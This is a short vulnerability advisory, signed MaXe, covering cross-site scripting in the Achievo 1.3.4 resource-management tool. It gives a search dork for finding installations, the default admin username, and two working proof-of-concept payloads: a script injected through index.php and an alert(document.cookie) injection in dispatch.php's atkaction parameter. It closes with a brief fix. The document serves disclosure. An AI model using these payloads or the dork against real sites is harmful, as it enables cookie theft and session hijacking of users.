Achievo - Cross Site Scripting Vulnerability
Version Affected: 1.3.4 (August 12, 2008) (newest)
Info: Achievo is a flexible web-based resource management tool for business environments.
Achievo's resource management capabilities will enable organisations to support their business processes in a simple, but
effective manner.
A solution that fits seamlessly to the wishes of every organisation and offers the possibility and freedom to adapt the
functionality to the needs of the organisation. It will fit into every organisation because Achievo is extremly easy to
change to your specific situation.
Opinion: Achievo seems to know what they're doing, or perhaps it's just because 99% of the platform is locked down.
Credits: webDEViL (for inspiring me) and all of InterN0T :-)
Googled0rk: (we were unable to produce an accurate d0rk)
inurl:/achievo/index.php intitle:achievo
However, why would One need a Googled0rk when One can just look here?
http://www.achievo.org/product/testimonials/
External Links:
http://www.achievo.org/
http://www.achievo.org/download/
http://www.achievo.org/demo/
Default Admin User:
administrator
-:: The Advisory ::-
Version Information:
http://www.website.tld/achievo/doc/CHANGES
Vulnerable Function / ID Calls: (XSS)
atkaction (this has to be used in conjunction with another main function call!)
Cross Site Scripting:
http://www.website.tld/achievo/index.php?"><script>alert(0)</script><br
Explained: The above has minimal impact as it's almost impossible if not impossible to abuse. This works only when One is
NOT logged in.
http://www.website.tld/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>
Explained: The above has greater impact as it will survive a login. This is not filtered as well. This works only when One
IS logged in.
Additional Information:
If: $config_session_regenerate = false; is set to 'true' in the config.inc.php then the session id's will be regenerated
on each hit/click preventing session hijacking.
-:: Solution ::-
The most easy solution is to validate user input and strip or convert bad / html characters. Setting the above to true
might solve the issue partially, however session hijacking is only one of the things you can do with cross site scripting.
Conclusion:
Achievo seems generally like a secure system with exception for the above. This advisory didn't contain that much, but
it's still 1 very minor and 1 minor hole. Basically the exploitation success all relies on the administrator or user you
execute this attack on.
Disclosure Information:
All of the best,
MaXe